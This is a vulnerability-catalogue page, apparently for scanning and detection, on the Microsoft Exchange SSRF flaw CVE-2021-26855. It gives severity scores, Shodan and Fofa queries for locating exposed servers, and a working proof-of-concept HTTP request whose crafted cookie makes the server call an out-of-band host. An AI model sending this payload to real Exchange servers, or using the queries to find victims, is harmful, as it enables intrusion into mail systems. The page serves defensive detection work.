🔙 목록으로 돌아가기

CVE-2021-26855: Microsoft Exchange Server SSRF Vulnerability

TitleMicrosoft Exchange Server SSRF Vulnerability
Authormadrobot
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.
RemediationApply the appropriate security update.
CVSS Score9.1
EPSS Score0.94351
CVE IDCVE-2021-26855
CWE IDCWE-918
Shodan Queryvuln:CVE-2021-26855http.favicon.hash:1768726119http.title:"outlook"cpe:"cpe:2.3:a:microsoft:exchange_server"
Fofa Querytitle="outlook"icon_hash=1768726119
Tags cve2021 cve ssrf rce exchange oast microsoft kev vkev vuln

🔍 Vulnerability Description

This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.

🌐 HTTP Request

GET /owa/auth/x.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Connection: close
Cookie: X-AnonResource=true; X-AnonResource-Backend=d5jnkd9le0o0va3i8jk0bxk3mzpc3mn74.oast.online/ecp/default.flt?~3;
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26855.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-26855.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A